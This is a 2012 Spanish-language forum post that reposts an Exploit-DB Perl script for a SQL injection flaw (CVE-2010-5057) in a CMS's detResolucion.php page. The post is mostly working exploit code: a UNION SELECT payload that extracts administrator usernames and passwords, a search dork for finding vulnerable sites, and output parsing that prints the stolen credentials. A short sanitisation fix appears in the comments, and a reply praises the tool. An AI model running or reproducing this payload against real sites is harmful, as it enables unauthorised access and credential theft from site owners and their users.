[Exploit] CMS Airdana SQL Injection

Iniciado por s3cur1tyr00t, Junio 25, 2012, 01:26:30 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Junio 25, 2012, 01:26:30 AM Ultima modificación: Junio 25, 2012, 05:50:36 AM por Pr0ph3t
EDB-ID: 12301   CVE: 2010-5057   OSVDB-ID: 63929
Author: Andrés Gómez   Published: 2010-04-19   Verified:
Exploit Code:      Vulnerable App:   N/A
   
Código: perl
use LWP::Simple;
################################################################
# Malicious users may inject SQL querys into a vulnerable
# application to fool a user in order to gather data from them or see sensible information.
################################################################
# Solution:
# $_GET = preg_replace("|([^\w\s\'])|i",'',$_GET);
# $_POST = preg_replace("|([^\w\s\'])|i",'',$_POST);
################################################################
my $target = $ARGV[0];
unless ($target) { print "\n Inyector Remoto -- HYPERNETHOST &
Security-Pentest -- Andres Gomez\n\n";
print "\ Dork: allinurl: detResolucion.php?tipodoc_id=\n";
print "\nEjemplo Ejecucion = AriadnaCms.pl
http://www.sitio.extension/path/\n" ; exit 1; }
$sql =
"detResolucion.php?tipodoc_id=33+and+1=0+union+select+concat(0x7365637572697479,adm_nombre,0x3a,0x70656e74657374,adm_clave)+from+administrador--";
$final = $target.$sql;
$contenido = get($final);
print "\n\n[+] Pagina Web: $target\n\n";
if ($contenido =~/security(.*):pentest(.*)/) {
print "[-] Datos extraidos con exito:\n\n";
print "[+] Usuario = $1\n";
print "[+] Password = $2\n";
} else {
print "[-] No se obtuvieron datos\n\n";
exit 1;
}
print "\n[ñ] Escriba exit para salir de la aplicacion\n";
exit 1;


Buen aporte! ya casi nadie codea sus propias herramientas! felicitaciones!

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".